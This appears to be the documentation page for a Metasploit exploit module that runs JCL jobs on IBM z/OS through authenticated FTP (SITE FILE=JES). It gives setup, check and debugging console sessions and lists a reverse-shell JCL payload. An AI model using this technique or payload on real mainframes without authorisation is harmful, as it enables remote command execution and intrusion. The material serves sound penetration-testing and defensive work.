z/OS JCL authorized FTP-base command execution - hints & tips In order to use this exploit, you must have valid credentials on the target z/OS system. The credentials must have access to upload files via FTP. If in doubt, use the check function of the exploit. ## Vulnerable Application This exploit was tested on the ftp daemons for z/OS version 1.13 / 2.1 ## Payloads If the exploit works, any JCL the user has rights to submit can be submitted. See cmd type payloads under mainframe with jcl in the payload name, e.g.: ``` msf exploit(ftp_jcl_creds) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- cmd/mainframe/generic_jcl normal Generic JCL Test for Mainframe Exploits cmd/mainframe/reverse_shell_jcl normal Z/OS (MVS) Command Shell, Reverse TCP ``` ## Verification Steps A successful check of the exploit will look like this: ``` msf exploit(ftp_jcl_creds) > set FTPUSER ftptest FTPUSER => ftptest msf exploit(ftp_jcl_creds) > set FTPPASS password FTPPASS => password msf exploit(ftp_jcl_creds) > set RHOST 10.10.10.1 RHOST => 10.10.10.1 msf exploit(ftp_jcl_creds) > info Name: FTP JCL Execution Module: exploit/mainframe/ftp/ftp_jcl_creds Platform: Mainframe Privileged: No License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2013-05-12 Available targets: Id Name -- ---- 0 auto Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- FTPPASS password no The password for the specified username FTPUSER ftptest no The username to authenticate as RHOST 10.10.10.1 yes The target address RPORT 21 yes The target port SLEEP 5 no Time to wait before checking if job has completed. Payload information: Description: Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires valid credentials on the target system msf exploit(ftp_jcl_creds) > check [+] 10.10.10.1:21 - Successfully connected to FTP server. [*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted [+] The target is vulnerable. msf exploit(ftp_jcl_creds) > ``` ## Debugging If the exploit or check is not working, turn on the VERBOSE and FTPDEBUG settings of the exploit and run. The output should look similar to the below, on a vulnerable system. ``` msf exploit(ftp_jcl_creds) > set FTPDEBUG true FTPDEBUG => true msf exploit(ftp_jcl_creds) > set VERBOSE true VERBOSE => true msf exploit(ftp_jcl_creds) > check [*] 10.10.10.1:21 - Connecting to FTP server 10.10.10.1:21... [*] 10.10.10.1:21 - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n" [*] 10.10.10.1:21 - Connected to target FTP server. [*] 10.10.10.1:21 - Authenticating as ftptest with password password... [*] 10.10.10.1:21 - FTP send: "USER ftptest\r\n" [*] 10.10.10.1:21 - FTP recv: "331 Send password please.\r\n" [*] 10.10.10.1:21 - Sending password... [*] 10.10.10.1:21 - FTP send: "PASS password\r\n" [*] 10.10.10.1:21 - FTP recv: "230 FTPTEST is logged on. Working directory is \"FTPTEST.\".\r\n" [+] 10.10.10.1:21 - Successfully connected to FTP server. [*] 10.10.10.1:21 - FTP send: "site file=jes\r\n" [*] 10.10.10.1:21 - FTP recv: "200 SITE command was accepted\r\n" [*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted [+] The target is vulnerable. msf exploit(ftp_jcl_creds) > ``` ## Notes The job run will leave a joblog for the credentials used.